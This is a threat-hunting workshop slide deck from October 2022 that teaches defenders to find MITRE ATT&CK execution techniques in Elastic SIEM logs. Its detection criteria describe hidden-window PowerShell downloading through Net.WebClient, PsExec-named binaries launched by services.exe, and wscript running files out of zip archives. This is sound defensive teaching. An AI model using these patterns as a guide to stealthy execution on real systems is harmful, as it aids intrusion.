Welcome to Class!

While You're waiting...

Don't Forget To:

☐ Download the Milestone Document in the Handouts Section

☐ Perform a new ingestion of the data to Elastic (See config guide)

☐ Login to HUNTER to make sure you have access

Note: if you haven't created your hunter account, go to www.Cyborgsecurity.com and hit the "SIGN UP"
button in the upper right, using promocode 'EXECUTION'
The Threat Hunting Workshop:

hunting for execution!

Hunting for behaviors of execution in an environment

WWW.CYBORGSECURITY.COM

05 OCT 2022
Let's go over a few things:

• Configuration

• Questions

• Webinar Recording

• Final challenge
 Introductions

• 10+ years IT

• 5 years SOC

• 3 years Threat Hunting

https://www.linkedin.com/in/lee-archinal/

Lee Archinal @ArchinalLee

(Instructor)
Introduction to EXECUTION
 • Execution consists of techniques that result in adversary-
What is controlled code running on a local or remote system.
EXECUTION? • Many different ways to accomplish the goal and you can fine more
here:
• https://attack.mitre.org/tactics/TA0002/ [1]

• Techniques discussed today

• T1059 – Command And Scripting Interpreter
• https://attack.mitre.org/techniques/T1059/ [2]
• T1569.002 – System Services: Service Execution
• https://attack.mitre.org/techniques/T1569/002/ [3]
• T1204.002 – User Execution: Malicious File
• https://attack.mitre.org/techniques/T1204/002/ [4]
 • We will be using the Elastic SIEM (Security Information and Event
Resource Manager)
List • Collects logs from different log sources and provides a central
location that is searchable.

• We will be using multiple languages

• Kibana Query Language (KQL)
• Process.id:4444
• Lucene
• Wildcard for "evil.exe"
• '/.*[Ee][Vv][Ii][Ll]\.[Ee][Xx][Ee].*/'
• Domain specific language
• These are the hunts that we are going to extract
from Hunter.

• Milestone document
• This contains some artifacts that we will find along the way as
well as your challenges.
 • We will be using the logs-* index to run our hunt, if you are not
QUICK NOTE seeing any logs, check that you have the correct index.

• We will be searching based off of a 24 hour window. If you have

not ingested the logs recently you may have to expand the
window to when you ingested the data find the logs.
HUNT PACKAGES
 • Malicious PowerShell Process - Connect To Internet With Hidden
HUNT Window
PACKAGES
• Metasploit / Impacket PsExec Process Creation Activity

• WScript Executing File From Zip - Potential Loader Execution

T1059 - COMMAND AND SCRIPTING INTERPRETER
 • Adversaries may abuse command and script interpreters to
Background execute commands, scripts, or binaries. These interfaces and
languages provide ways of interacting with computer systems
and are a common feature across many different platforms. [2]

• These include are but are not limited to:

• PowerShell
• Windows Command Shell
• Unix Shell
 • EventType: Process Create
Opportunities
TO HUNT FOR • Windows Event ID 4688

• Sysmon Event ID 1

• Powershell Script Block Logging

Malicious PowerShell Process -
Connect To Internet With Hidden Window

•Focus of the Hunt:

•Process Being Created: PowerShell

•CommandLine contains:
•Arguments of flags that suggest that a hidden shell is being created.
•Any combination of “–windowstyle” and “hidden”
•Arguments that suggest it is reaching out to the internet to fetch a file
•Looking for Net.WebClient and “New-Object”
T1569.002 - METAPLOIT / IMPACKET PSEXES PROCESS
CREATION ACTIVITY
 • Adversaries may abuse the Windows service control manager
Background to execute malicious commands or payloads. The Windows
service control manager (services.exe) is an interface to
manage and manipulate services.[3] Services that are created
can be found in registry keys

• PsExec is a free Microsoft tool that can be used to execute a

program on another computer. It is used by IT administrators
and attackers.
• https://attack.mitre.org/software/S0029/ [5]
 • EventType: Process Create
Opportunities
TO HUNT FOR • Windows Event ID 4688

• Sysmon Event ID 1

• Powershell Script Block Logging

Hunt package used
• Metasploit / Impacket PsExec Process Creation Activity
• Focuses on a naming convention that has been tested and determined to be
a constant action that happens when either tool’s PsExec module is used.

• Looking for:
• ParentProcess=*services.exe
• ProcessName=C:\Windows\[8 alpha-character name consisting of either
lowercase, uppercase, or a combination of the two].exe
• Event that correlates with a process create type.
T1204.002 - wscript executing file from zip
potential loader execution
 • An adversary may rely upon a user opening a malicious file in
Background order to gain execution. Users may be subjected to social
engineering to get them to open a file that will lead to code
execution. [4]

• Similar to the normal phishing campaigns that involve a

document and a macro, malicious files may be saved in an
archive for the user or the threat actor to extract
or execute.
 • EventType: Process Create
Opportunities
for detection • Windows Event ID 4688

• Sysmon Event ID 1

• Powershell Script Block Logging

Wscript executing file from zip -
Potential loader

• Focus of the Hunt:

• Process Create Event Type

• ProcessName=“*wscript.exe

• ProcessCommandLine IS ONE OF (7z, zip, RAR)

• ProcessCommandLine=*\temp\
TO THE HUNT!
The Final Challenge
 Earn Your • In your threat hunting platform there is one more example of
execution.
Threat
Hunting • Use what you have learned today to find the method and answer
the challenge questions using data from the log file.
Credentials!
• There are no time limits.

• https://info.cyborgsecurity.com/execution
Q&A
HUNTER
The threat hunting content platform

Get access for FREE with promo code: execution

https://www.huntwithcyb.org/hunter
Cyborg Security has launched a podcast with a twist! Join us for a terrifyingly fun evening on October
27th from 7:00 – 8:30 pm ET for Episode 3 of Out of the Woods: The Threat Hunting Podcast!

This Halloween season, join a rag-tag bunch of threat hunters around the campfire as they come out of
the haunted woods to talk about the bone-chilling topics that affect threat hunters, security researchers,
and threat intelligence professionals.
 follow US

@CyborgSecInc

cyborg-security

Cyborg Security

@CyborgSecInc

Cyborg Security

05 OCT 2022